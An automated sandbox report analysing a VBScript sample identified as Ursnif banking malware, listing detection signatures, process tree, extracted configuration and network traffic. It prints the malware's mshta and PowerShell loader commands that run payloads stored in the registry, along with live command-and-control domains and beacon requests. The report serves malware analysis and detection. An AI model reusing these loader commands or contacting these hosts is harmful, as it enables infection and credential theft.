Play interactive tour

Edit tour

Analysis Report 2Q4tLHa5wbO1.vbs

Overview

General Information

Sample Name:	2Q4tLHa5wbO1.vbs
Analysis ID:	321602
MD5:	afa1319ab7c53ec14f6e2b5b403d4d08
SHA1:	1081298acf917fed6ed090c3d5ed642eef9e0f34
SHA256:	7eb2fa04c617f7c2adcfe5f2f6d0fef4dc20d89c30e06158ee1bcb94e5c128a2
Most interesting Screenshot:

Detection

Ursnif

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Sigma detected: Dot net compiler compiles file from suspicious location

VBScript performs obfuscated calls to suspicious functions

Yara detected Ursnif

Allocates memory in foreign processes

Changes memory attributes in foreign processes to executable or writable

Compiles code for process injection (via .Net compiler)

Creates a thread in another existing process (thread injection)

Creates processes via WMI

Deletes itself after installation

Disables SPDY (HTTP compression, likely to perform web injects)

Found Tor onion address

Hooks registry keys query functions (used to hide registry keys)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the export address table of user mode modules (user mode EAT hooks)

Modifies the import address table of user mode modules (user mode IAT hooks)

Modifies the prolog of user mode functions (user mode inline hooks)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Sigma detected: MSHTA Spawning Windows Shell

Sigma detected: Suspicious Csc.exe Source File Folder

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file access)

Uses nslookup.exe to query domains

WScript reads language and country specific registry keys (likely country aware script)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Compiles C# or VB.Net code

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Suspicious Rundll32 Activity

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

System is w10x64

wscript.exe (PID: 4180 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\2Q4tLHa5wbO1.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

iexplore.exe (PID: 7092 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 4168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6020 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17418 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7092 CREDAT:17424 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

mshta.exe (PID: 7008 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)

powershell.exe (PID: 4604 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)

conhost.exe (PID: 3980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

csc.exe (PID: 3484 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES269.tmp' 'c:\Users\user\AppData\Local\Temp\5b2bnkld\CSC18B8FCEB9D646308CD119582578A238.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

csc.exe (PID: 4700 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ztp4fhzn\ztp4fhzn.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)

cvtres.exe (PID: 796 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES16AC.tmp' 'c:\Users\user\AppData\Local\Temp\ztp4fhzn\CSC901590E0DE33494E82C695FA40AE49BE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)

control.exe (PID: 6328 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

RuntimeBroker.exe (PID: 3656 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4268 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

cmd.exe (PID: 2216 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\404E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)

conhost.exe (PID: 6692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6632 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)

RuntimeBroker.exe (PID: 4772 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

RuntimeBroker.exe (PID: 4660 cmdline: MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)

rundll32.exe (PID: 6828 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713745606.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
0000001E.00000000.822942973.000000000688E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000025.00000002.920076099.0000023FE357E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.784762432.0000000005000000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713671055.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.726412237.0000000004CBB000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713608519.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000002.813116966.00000000051F0000.00000040.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000019.00000003.795282435.0000022982C20000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000027.00000003.846098745.0000027FF7200000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713720104.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713577898.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713547031.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713695029.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000002.00000003.713644884.0000000004E38000.00000004.00000040.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000022.00000002.916792918.000001DA4C27E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
00000020.00000002.917824420.000001B4FAD4E000.00000004.00000001.sdmp	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: rundll32.exe PID: 6828	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: RuntimeBroker.exe PID: 3656	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: control.exe PID: 6328	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: powershell.exe PID: 4604	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Process Memory Space: explorer.exe PID: 3424	JoeSecurity_Ursnif	Yara detected Ursnif	Joe Security
Click to see the 22 entries

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', ProcessId: 3484

Sigma detected: MSHTA Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 7008, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 4604

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4604, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\5b2bnkld\5b2bnkld.cmdline', ProcessId: 3484

Sigma detected: Suspicious Rundll32 Activity

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6328, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6828

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

Avira: detection malicious, Label: TR/Crypt.XDR.Gen

Found malware configuration

Show sources

Source: explorer.exe.3424.30.memstr

Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "ip": "84.17.52.25", "version": "250157", "uptime": "394", "system": "98b39ff57b4a9bfe82f904932dc722b0", "crc": "602f0", "action": "00000001", "id": "3300", "time": "1606130412", "user": "902d52678695dc15e71ab15cf0142f97", "soft": "1"}

Multi AV Scanner detection for domain / URL

Show sources

Source: c56.lepini.at	Virustotal: Detection: 12%	Perma Link
Source: api3.lepini.at	Virustotal: Detection: 10%	Perma Link
Source: api10.laptok.at	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\marginal.roq

Joe Sandbox ML: detected

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Local

Networking:

Found Tor onion address

Show sources

Source: powershell.exe, 00000012.00000003.799740968.000001EFF5FD0000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000019.00000002.846903592.0000000000BAE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: explorer.exe, 0000001E.00000003.808606221.0000000002B40000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: RuntimeBroker.exe, 0000001F.00000002.919536378.0000027D4F83E000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: rundll32.exe, 00000027.00000002.847373383.0000027FF74FE000.00000004.00000001.sdmp	String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1

Uses nslookup.exe to query domains

Show sources

Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: global traffic

HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at

Source: Joe Sandbox View

IP Address: 47.241.19.44 47.241.19.44

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: global traffic	HTTP traffic detected: GET /api1/OdjgwCqVJwPbZSsZ/VYrVT8VCOKL6QD5/EVmo1TumZD8KFbU_2F/DqCRYFqUt/6t1Wi5sZ6Sd10ZyeuxsI/zz_2BvVs4Qba4SjUA81/XTlzG2Ikb6e4IhPsrP2pW5/IOYwufo82QfRm/dMck8gxG/UZU1HPUj7EpbLym6Tf1ZXia/MduJyH_2BJ/WUEq3SnF_2FcXcMTp/Xq474GevRlOt/vDC5iQyZB9v/TjWELQbwGzWKMO/lagHfBD7ms5J_2BDQZ3w8/PtBT4jSv2lZUfu_0/A_0DP97GvnPGpv0/X1fJAQJ3FbyqO_2B4n/YGBi_2Ftdmzlg/gz3C3rVo/j HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/HCmdTF9ssS2xPQYmTqbko/QSaXs_2BFCMwb9WJ/TzYhMx5eXoG7h0c/n88BmwhZe9ijt5oT_2/Fx6667KDX/SidvZb9thKv8bvTE_2Bd/bd09MXr6sZJK_2B0qyS/ttipC86Fa_2BhWcPHgFDgb/FLKb2aUcMy7Ws/o6qiRO8c/nNeTK_2FSOWylkimJJN1ZPK/7CLWQhh7_2/FsBidPde1di4dmq_2/FoYbJ3dZ5_2F/jbxcTO3nXc9/SExxKRXHJLHHvI/_2BhbueQTaU2MuoAANkGM/Ms1_0A_0DsFCZtvF/RsiXqTx0w_2B7BA/8qwDi436YGxlKYNqBk/I9GfQ7ay9/1WHi9CeL/hOQKKrEqdJo6/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /api1/KuF_2F7v1MfxGX_2FqHF/gE7HR_2BEW_2FETIZlo/3O7oOiSknl3ZdKUC6RNt6Z/TpA_2BZA44zII/bnPVc30i/qqGquE5ikDsN3lqsmRQUi6s/01UAcvdPS6/Y4vwKTH4z9SKX83Hk/GzPOGAYN_2Ba/uwZA847uRup/qUVRcsxtj_2B4M/Zg0BM4mqEN49EAfvZiK8m/hblONlnAdbx7_2FY/dksXSYXlnNujYzz/8J_2BxPtB78im5D1oF/b4ehtOJuT/4O2ZohnCHbAXcsKJP56g/k9_0A_0DMSUG1trlbpE/x9OMnUuruu3aGaoqe55RFv/8pmbW_2FjbM3S/_2FlfQQC/a7gxCYKdIB_2BmP/Gfdfp HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, /Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic	HTTP traffic detected: GET /api1/IFYp0PHJ_2BMM/wnyhOVyw/DTs0YCcjJ3qF45s5mMb3gCK/4RNSmr4vxJ/t3onykIcbr_2FK9Xl/H4TzJ_2FhWjS/VeLVa7O7zLV/8TE8KNMU3WmVp7/1SZwuOnHWsYhkdJWGRZAO/qo7x2rkUbXkHUJ_2/BC7f_2BJ0A1Duj6/Ipk_2FJFklx32RY4N0/bk5DAm8jE/qW10iqV6xd9Zezvdl1zm/BnhClBi9RrNKwOk_2Bm/fx09VPfvVJosXa3PmEErZX/NEcSBwStFW8Y4/j9LX0_0A/_0DyR3w9VgUnyTwYjUOpcPC/rfYZc9XYZ8/Dq1kzhh1/E7PDPOgD/b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Host: api3.lepini.at

Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001E.00000000.830554499.000000000DAD3000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: RuntimeBroker.exe, 00000020.00000000.821757355.000001B4FAF7D000.00000004.00000001.sdmp	String found in binary or memory: Like us on Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: api10.laptok.at

Source: unknown

HTTP traffic detected: POST /api1/v3jshWKSZC/krn1p7RrW8z3GbGc_/2FFaZK_2BekT/0OtUsmpYx6p/WfQzt4S0Zn457c/1i9HHJRZikaIvJ_2F4Ld0/npT_2Bob9NwfipWw/nUig82mch1FFwH2/1AhxrjhRqExAflhNHx/Cb9luck68/wJ0bPw_2BlEIUsEBoTa7/b3vKAY1TUvvWyKMIerF/bnMrh0BhKsVoIInhXNlnvd/gshefiHtEYuWl/JyEMRLpF/nO3AiIuXH9ihbmxg5VrB2D_/2B1gectVzg/fTJ8Ip_0A_0DE7j3s/GvjWVtZw3Zx0/xpwKnQogZJC/sFRvTTh1zHV/2QqrR8_2B/H HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0Content-Length: 2Host: api3.lepini.at

Source: global traffic

